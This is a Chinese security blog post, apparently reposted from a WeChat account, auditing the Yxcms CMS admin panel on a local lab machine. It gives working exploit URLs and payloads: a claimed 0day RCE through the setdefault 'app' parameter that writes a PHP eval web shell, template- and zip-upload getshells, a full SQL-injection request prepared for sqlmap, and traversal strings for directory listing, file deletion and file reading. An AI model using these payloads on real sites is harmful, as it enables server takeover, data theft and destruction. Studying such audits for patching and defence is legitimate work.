Yxcms代码审计后台RCE(0day)

admin 2024年9月30日12:11:26评论38 views字数 4827阅读16分5秒阅读模式
声明:本文仅用于网络安全相关知识分享,环境为本机靶场,请严格遵守网络安全相关法律法规。
未经授权利用本文相关技术从事违法活动的,一切后果由违法人自行承担!Jie安全公众号及作者不承担任何法律责任。
起因是在打内网靶场时,发现靶机用的Yxcms,并且扫描到源码。
网上getshell方式几乎都是新增、编辑模板文件,想着尝试去审计一波,看看有没有其他getshell的方式,于是就有了该文。
RCE
漏洞发生在yxcmsprotectedappsappmanagecontrollerindexController.php文件中的setdefault方法,其实和模板差不多,都用了file_put_contents写入文件,虽然此处$file是不可控的,但是未过滤传入的app值。
Yxcms代码审计后台RCE(0day)
先跟进getApp,作用是接收并返回app的值
Yxcms代码审计后台RCE(0day)
不管中间正则干了什么,构造下链接看看
Yxcms代码审计后台RCE(0day)
http://192.168.0.106/index.php?r=appmanage/index/setdefault&app=123
会将app的值写进index.php文件中
Yxcms代码审计后台RCE(0day)
访问根路径
Yxcms代码审计后台RCE(0day)
写个phpinfo();试试有没有过滤
Yxcms代码审计后台RCE(0day)
虽然未过滤,但是执行不了
Yxcms代码审计后台RCE(0day)
Yxcms代码审计后台RCE(0day)
闭合'),最终payload
http://192.168.0.106/index.php?r=appmanage/index/setdefault&app=');phpinfo();//
Yxcms代码审计后台RCE(0day)
该操作会将所有页面都变成phpinfo页面
Yxcms代码审计后台RCE(0day)
Yxcms代码审计后台RCE(0day)
把index.php中的标记部分删了才能恢复
Yxcms代码审计后台RCE(0day)
Yxcms代码审计后台RCE(0day)
写马
http://192.168.0.106/index.php?r=appmanage/index/setdefault&app=');@eval($_POST[wj]);//
Yxcms代码审计后台RCE(0day)
蚁剑连接
Yxcms代码审计后台RCE(0day)
Getshell
Yxcms代码审计后台RCE(0day)
审计出来的其余3处getshell已经早被别人挖了,1处就是模板,另外2处是上传zip文件。
模板getshell
一处tpadd
Yxcms代码审计后台RCE(0day)
Yxcms代码审计后台RCE(0day)
创建完打开
http://192.168.0.106/protected/apps/default/view/default/wj.php
Yxcms代码审计后台RCE(0day)
一处tpedit
Yxcms代码审计后台RCE(0day)
Yxcms代码审计后台RCE(0day)
编辑完打开
http://192.168.0.106/protected/apps/default/view/default/acomment.php
Yxcms代码审计后台RCE(0day)
上传ZIPgetshell1
需要保证上传的zip里含有config.php文件,并且zip文件不能和已上传的重名
Yxcms代码审计后台RCE(0day)
Yxcms代码审计后台RCE(0day)
压缩包放两个文件,一个config.php一个phpinfo
Yxcms代码审计后台RCE(0day)
上传
Yxcms代码审计后台RCE(0day)
访问
http://192.168.0.106/protected/apps/wj/wj.php
Yxcms代码审计后台RCE(0day)
上传ZIPgetshell2
Yxcms代码审计后台RCE(0day)
就用上面的zip包
http://192.168.0.106/index.php?r=appmanage/index/onlineinstall&url=http://192.168.0.106/wj.zip
Yxcms代码审计后台RCE(0day)
访问
http://192.168.0.106/protected/apps/wj/wj.php
Yxcms代码审计后台RCE(0day)
SQL注入
Yxcms代码审计后台RCE(0day)
这SQL写的,你防不了,唉,你防不了
Yxcms代码审计后台RCE(0day)
sqlmap梭哈
POST /index.php?r=admin/sort/newsedit&id=100024 HTTP/1.1Host: 192.168.0.106Content-Length: 1309Cache-Control: max-age=0Origin: http://192.168.0.106Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1mQQezLmVeBrWBoXUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://192.168.0.106/index.php?r=admin/sort/newsedit&id=100024Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=b198afc7543bf7258875fc205cde7d9b; Connection: close------WebKitFormBoundary1mQQezLmVeBrWBoXContent-Disposition: form-data; name="parentid"0------WebKitFormBoundary1mQQezLmVeBrWBoXContent-Disposition: form-data; name="sortname"分类信息------WebKitFormBoundary1mQQezLmVeBrWBoXContent-Disposition: form-data; name="picture"; filename=""Content-Type: application/octet-stream------WebKitFormBoundary1mQQezLmVeBrWBoXContent-Disposition: form-data; name="oldpicture"------WebKitFormBoundary1mQQezLmVeBrWBoXContent-Disposition: form-data; name="keywords"分类信息演示------WebKitFormBoundary1mQQezLmVeBrWBoXContent-Disposition: form-data; name="description"分类信息演示------WebKitFormBoundary1mQQezLmVeBrWBoXContent-Disposition: form-data; name="num"10------WebKitFormBoundary1mQQezLmVeBrWBoXContent-Disposition: form-data; name="tplist"news_sortindex------WebKitFormBoundary1mQQezLmVeBrWBoXContent-Disposition: form-data; name="cnlist"news_content*------WebKitFormBoundary1mQQezLmVeBrWBoXContent-Disposition: form-data; name="norder"0------WebKitFormBoundary1mQQezLmVeBrWBoXContent-Disposition: form-data; name="ifmenu"1------WebKitFormBoundary1mQQezLmVeBrWBoXContent-Disposition: form-data; name="extendid"0------WebKitFormBoundary1mQQezLmVeBrWBoX--

Yxcms代码审计后台RCE(0day)

有第一处注入就有第二处注入,时间宝贵,不搞了

目录遍历

Yxcms代码审计后台RCE(0day)

无效过滤

http://192.168.0.106/index.php?r=admin/files/index&dirget=/../../../../../../../

Yxcms代码审计后台RCE(0day)

目录遍历也有好几处,其他不写了

任意文件删除

Yxcms代码审计后台RCE(0day)
也是无效过滤
Yxcms代码审计后台RCE(0day)
http://192.168.0.106/index.php?r=admin/files/del&fname=../../../../../../../../../../../../../1.txt
Yxcms代码审计后台RCE(0day)
任意文件删除也有好几处,也不写了
任意文件读取
Yxcms代码审计后台RCE(0day)
文件名、路径拼接
POST /index.php?r=admin/set/tpgetcode HTTP/1.1Host: 192.168.0.106Content-Length: 50Cache-Control: max-age=0Origin: http://192.168.0.106Content-Type: application/x-www-form-urlencodedUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://192.168.0.106/index.php?r=admin/sort/newsedit&id=100024Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=b198afc7543bf7258875fc205cde7d9b; Connection: closeMname=/../../../../../../../../../../&fname=/1.csv
Yxcms代码审计后台RCE(0day)
POST /index.php?r=admin/set/tpgetcode HTTP/1.1Host: 192.168.0.106Content-Length: 50Cache-Control: max-age=0Origin: http://192.168.0.106Content-Type: application/x-www-form-urlencodedUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://192.168.0.106/index.php?r=admin/sort/newsedit&id=100024Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=b198afc7543bf7258875fc205cde7d9b; Connection: closeMname=/&fname=/../../../../../../../../../../1.csv
Yxcms代码审计后台RCE(0day)

原文始发于微信公众号(Jie安全):Yxcms代码审计后台RCE(0day)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月30日12:11:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Yxcms代码审计后台RCE(0day)http://cn-sec.com/archives/3222169.html

发表评论

匿名网友 填写信息